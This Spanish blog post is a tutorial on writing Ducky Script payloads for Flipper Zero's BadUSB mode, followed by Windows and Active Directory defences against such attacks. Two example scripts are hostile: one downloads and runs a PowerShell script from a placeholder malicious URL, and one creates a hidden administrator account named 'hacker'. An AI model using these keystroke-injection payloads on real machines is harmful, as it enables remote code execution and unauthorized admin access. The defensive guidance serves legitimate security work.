Blog Virtualizacion Tu Blog de Virtualización en Español. Maquinas Virtuales (El Blog de Negu) en castellano. Blog informática vExpert Raul Unzue
Artículos relacionados
Guía Completa de Ducky Script en Flipper Zero: Automación y Seguridad
Como ya hemos hablado, Flipper Zero es un multiherramienta de ciberseguridad que permite interactuar con dispositivos inalámbricos, tarjetas RFID, infrarrojos y mucho más. Una de sus funciones más interesantes es BadUSB, que permite ejecutar scripts en Ducky Script para automatizar tareas y ejecutar comandos en sistemas Windows, Android, IOs, MacOS o Linux.
Een esta guía os enseñaremos a cómo crear, probar y ejecutar scripts en Flipper Zero con BadUSB, explicando cada comando en detalle y proporcionando ejemplos prácticos. Y como no, como evitar qué en vuestra Infraestructura usen este tipo de herramientas.
¿Qué es Ducky Script en Flipper Zero?
Ducky Script es un lenguaje de automatización diseñado para escribir comandos de teclado que se ejecutan al conectar un dispositivo como USB Rubber Ducky o Flipper Zero en modo BadUSB.
El sistema operativo detecta el Flipper Zero como un teclado HID, permitiéndole escribir comandos automáticamente sin restricciones de seguridad avanzadas.
Flipper Zero no soporta todas las funciones, os dejo una tabla comparativa:
| Funcionalidad | USB Rubber Ducky | Flipper Zero |
| Soporte completo de Ducky Script | ✅ | (algunas diferencias) |
| Soporte para LOOP | ✅ | ❌ |
| Soporte para DELAY | ✅ | ✅ |
| Reproducción de archivos desde almacenamiento interno | ❌ | ✅ |
| Edición y ejecución de scripts en tiempo real | ❌ | ✅ |
Sintaxis y comandos básicos en Ducky Script para Flipper Zero
Ducky Script es un lenguaje basado en texto donde cada línea representa una acción a ejecutar.
Os dejo varios comandos básicos:
| Comando | Descripción |
| STRING texto | Escribe el texto especificado como si lo tecleara un usuario. |
| DELAY ms | Pausa la ejecución en milisegundos (1000 = 1s). |
| ENTER | Simula la tecla Enter. |
| TAB | Simula la tecla Tab. |
| ESCAPE | Simula la tecla Escape. |
| BACKSPACE | Simula la tecla de retroceso. |
| SPACE | Simula la barra espaciadora. |
| CONTROL + [tecla] | Simula Control + otra tecla (Ej: CONTROL + C). |
| ALT + [tecla] | Simula ALT + otra tecla. |
| GUI + [tecla] | Simula la tecla Windows (GUI = Tecla Windows). |
| SHIFT + [tecla] | Simula Mayúsculas + otra tecla. |
Creación de scripts en Flipper Zero
Los scripts de BadUSB en Flipper Zero se guardan como archivos .txt y deben ubicarse en la carpeta BadUSB en la memoria interna o en una tarjeta microSD.
- Ejemplo básico: abrir el Bloc de notas y escribir un mensaje
|
1 2 3 4 5 6 7 8 |
DELAY 500 GUI r DELAY 200 STRING notepad ENTER DELAY 500 STRING Hola, este es un script en Flipper Zero ENTER |
-
- Explicación:
- Abre “Ejecutar” (GUI r -> Windows + R).
- Escribe “notepad” y lo abre (STRING notepad + ENTER).
- Escribe un mensaje en el Bloc de notas.
Ejecutando scripts en Flipper Zero
Pasos para ejecutar un script:
- Conectar Flipper Zero al PC.
- Copiar el script “.txt”a la carpeta “badusb/” en la memoria interna o microSD.
- Desde el Flipper Zero, ir a:
- Main Menu -> Applications -> Bad KB
-
- Seleccionar el script
- Pulsar Run para ejecutarlo.
Ejemplos avanzados de scripts en Flipper Zero
- Ejecutar un comando en PowerShell para descargar un archivo:
Este script descarga y ejecuta un archivo de PowerShell desde una URL remota.
|
1 2 3 4 5 6 7 8 9 10 |
DELAY 500 GUI r DELAY 500 STRING powershell ENTER DELAY 1000 STRING Invoke-WebRequest -Uri "http://webmaliciosa/script.ps1" -OutFile "C:\Users\Public\script.ps1" ENTER STRING Start-Process "C:\Users\Public\script.ps1" ENTER |
- Crear un usuario administrador oculto en Windows:
|
1 2 3 4 5 6 7 8 9 10 11 12 |
DELAY 500 GUI r DELAY 500 STRING cmd ENTER DELAY 500 STRING net user hacker Password123 /add ENTER STRING net localgroup Administrators hacker /add ENTER STRING net user hacker /active:yes ENTER |
Lenguajes de Scripting en Flipper Zero
Flipper Zero es un dispositivo versátil que admite varios lenguajes de scripting, además de Ducky Script. La siguiente tabla muestra los lenguajes más utilizados y sus propósitos:
| Lenguaje | Uso principal | Ejemplo de aplicación |
| Ducky Script | Automatización de teclado y BadUSB | Ejecución de comandos en Windows/macOS/Linux simulando teclado |
| Python | Scripts avanzados y herramientas personalizadas | Creación de plugins y explotación de redes |
| Flipper Apps (.fap) | Extensiones nativas en C para Flipper Zero | Desarrollo de nuevas funciones en firmware |
| RFID/NFC Scripts | Manipulación de tarjetas RFID y NFC | Clonación, lectura y escritura de tarjetas |
| Infrared (IR) Scripts | Control de dispositivos IR (TVs, aire acondicionado, etc.) | Creación de controles remotos personalizados |
| Sub-GHz Scripts | Comunicación con dispositivos Sub-GHz | Clonación de mandos de garaje, barreras de seguridad |
| GPIO/Serial Scripts | Interacción con hardware externo vía UART/GPIO | Comunicación con microcontroladores y dispositivos IoT |
Protección contra ataques BadUSB en Flipper Zero
Para evitar ser víctima de ataques BadUSB os vamos a dar unas pautas básicas. Para proteger tu sistema contra ataques BadUSB en Windows 11 y entornos de Directorio Activo, puedes aplicar las siguientes medidas:
Protección en Windows 11 (Máquina Individual)
1. Deshabilitar Dispositivos HID Desconocidos
Los ataques BadUSB funcionan porque Windows detecta Flipper Zero como un teclado HID. Para bloquear dispositivos desconocidos:
- Abre Administrador de dispositivos (devmgmt.msc).
- Expande Teclados.
- Conecta Flipper Zero y revisa el nuevo dispositivo agregado.
- Haz clic derecho sobre él y selecciona Deshabilitar dispositivo.
2. Restringir Instalación Automática de Controladores
- Presiona Win + R, escribe gpedit.msc y presiona Enter.
- Ve a Configuración del equipo → Plantillas administrativas -> Sistema -> Instalación de dispositivos.
- Habilita Evitar la instalación de dispositivos no descritos por otras configuraciones de directiva.
- Aplica y reinicia el equipo.
3. Habilitar “Bloqueo de Dispositivos USB” con Windows Defender
- Abre Windows Security (Windows + I -> Seguridad de Windows).
- Ve a Control de aplicaciones y navegador.
- Activa Acceso controlado a carpetas y Protección contra ataques USB.
Protección en un Entorno de Directorio Activo (AD)
Si gestionas una red empresarial con Active Directory (AD), puedes bloquear dispositivos BadUSB de forma centralizada.
1. Bloquear Dispositivos USB con GPO (Política de Grupo)
- Abrir el Editor de Políticas de Grupo (gpedit.msc o gpmc.msc en un controlador de dominio).
- Navegar a:
- Configuración del equipo -> Plantillas administrativas -> Sistema -> Instalación de dispositivos -> Restricciones de instalación de dispositivos.
- Habilitar la política Evitar la instalación de dispositivos que coincidan con estos ID.
- Añadir los ID de Hardware de Flipper Zero y otros dispositivos BadUSB.
- Para obtener el ID de hardware:
- Conectar el dispositivo y abrir Administrador de dispositivos.
- Clic derecho en el dispositivo -> Propiedades -> Detalles -> ID de hardware.
- Para obtener el ID de hardware:
- Aplicar la política y reiniciar los equipos.
2. Restringir el Uso de Teclados Externos No Autorizados
- En Directiva de Grupo, ve a:
- Configuración del equipo -> Configuración de seguridad -> Políticas de restricción de software.
- Crea una nueva regla para impedir la ejecución de archivos con nombres como cmd.exe, powershell.exe, wscript.exe, etc., desde medios USB.
3. Implementar Seguridad con Microsoft Defender for Endpoint
Si tu organización usa Microsoft Defender for Endpoint, puedes:
- Configurar reglas de reducción de superficie de ataque:
- Bloquear scripts sospechosos (wscript, powershell, etc.).
- Restringir acceso a la ejecución de comandos desde USB.
- Activar alertas de comportamiento anómalo en dispositivos USB.
4. Usar Software de Control de Dispositivos (MDM o DLP)
- Herramientas como Microsoft Intune, Symantec Endpoint Protection o McAfee DLP permiten bloquear dispositivos USB desconocidos y prevenir ataques BadUSB.
La mejor defensa contra los ataques BadUSB con Flipper Zero es la prevención y configuración de políticas de seguridad adecuadas. Tanto en Windows 11 como en redes empresariales con Active Directory, puedes implementar medidas como:
- Bloqueo de HID desconocidos.
- Restringir instalación de drivers.
- Control de acceso a dispositivos USB con GPO.
- Seguridad avanzada con Defender for Endpoint.
Si bien Flipper Zero es una herramienta poderosa para pentesting y automatización, es importante conocer los riesgos que puede representar en manos malintencionadas.
Ducky Script en Flipper Zero es una herramienta potente para la automatización y pruebas de seguridad. Con BadUSB, puedes realizar tareas avanzadas en Windows, Android, IOs, MacOS y Linux con solo conectar el dispositivo.
Sin embargo, también representa un riesgo si cae en manos equivocadas. Por eso, aprende a usarlo de forma responsable y mejora tus defensas contra este tipo de ataques.
Te ha gustado la entrada SGUENOS EN TWITTER O INVITANOS A UN CAFE?
